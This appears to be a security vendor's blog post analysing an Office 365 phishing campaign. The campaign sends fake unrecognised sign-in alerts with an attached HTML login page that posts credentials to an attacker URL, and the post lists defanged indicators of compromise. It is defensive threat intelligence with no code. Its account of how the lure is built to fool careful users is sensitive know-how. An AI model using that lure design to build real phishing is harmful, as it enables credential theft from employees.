Share:

By Luis Raul Parra, Cofense Phishing Defense Center

Asome point in your (digital) life you have received annoying notifications about unexpected signin attempts to one of your accounts/services, and you have ignored them. After all, it was just an attempt – no one was able to access anything. Yet, if you are vigilant enough, you would report this unauthorized attempt to the service provider and contribute to enhancing security. Well done! But keep reading; this article is for you.  

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Office365 (O365) credentials of “vigilant” users who want to act on unrecognized sign-in attempts to their accounts.  

The campaign was reported by users in several companies across Englishspeaking countries including the United States, England and Scotland. The message was carefully crafted to pass as a real alert of an unexpected sign-in on the recipient’s corporate account. It urged immediate action. 

Figure 1: Email Body

All reported emails used the same technique to customize the attack: The “From” field contained the address “postmaster@COMPANYDOMAIN.cpasurveys.com” in order to convince the end user that this was a valid alert notification from their company’s email security system.  

Figure 2: Email Header

The subject of the email states that there was a sign-in attempt to the user’s account from an unrecognized device, specifying the name of the user and claiming to come from “COMPANYNAME Mail Service”. The content of the body states the timestamp, location, IP address and device where the (false) attempt was performed. In all cases, the IP address shown in the body was 194[.]209[.]77[.]62.  

To make the email even more credible, the attackers included a confirmation code stated to be valid for 24 hours with aims of pressuring the recipient to act within that time. They were thoughtful enough to add the message “if this was you, you’re all set!” 

Furthermore, there was the option to click on the “Unsubscribe” button in order to stop receiving future messages like these. The URL behind a link of the type hxxps://tracking[.]mail[.]netflix[.]tshirtsintaramerica[.]com/click/* is possibly just a tracker that then redirected to the official company website.

The credential phishing attempt was done through an HTML file attached to the email. Images and CSS styles were pulled from a different website: hxxps://youmustlast[.]website/wassets/: 

Figure 3: CSS Style 

The HTML file already contained the user’s email address in the email account address field: 

Figure 4: Phishing Page

Should the recipient enter the corporate credentials into the attached HTML page, a POST action sends the username and password to the threat actor and the URL hxxps://sharepreview[.]site/win/next[.]php

Figure 5: POST Action

Credential phishing done. At the same time, you’ve been made to feel vigilant at having spotted something untoward happening with your account. That’s how the attackers attempt to trip up alert and conscientious users.  

Network IOC   IP   
hXXps://sharepreview[.]site/win/next[.]php  23[.]254[.]130[.]108 
hXXps://youmustlast[.]website/wassets/statuspage[.]css  63[.]250[.]38[.]73 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.